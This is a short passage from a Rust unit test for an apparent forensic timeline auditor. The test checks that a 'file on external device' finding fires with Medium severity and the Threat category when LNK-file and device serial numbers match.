1722        let devices = DeviceSource::new(&conns);
1723        let timeline = build_timeline(&[&lnk, &devices]);
1724        let findings = audit(&timeline);
1725        let f = findings
1726            .iter()
1727            .find(|f| f.code == "USERACT-FILE-ON-EXTERNAL-DEVICE")
1728            .expect("file-on-external-device must fire when serials match");
1729        assert_eq!(f.severity, Some(Severity::Medium));
1730        assert_eq!(f.category, Category::Threat);
1731    }
1732}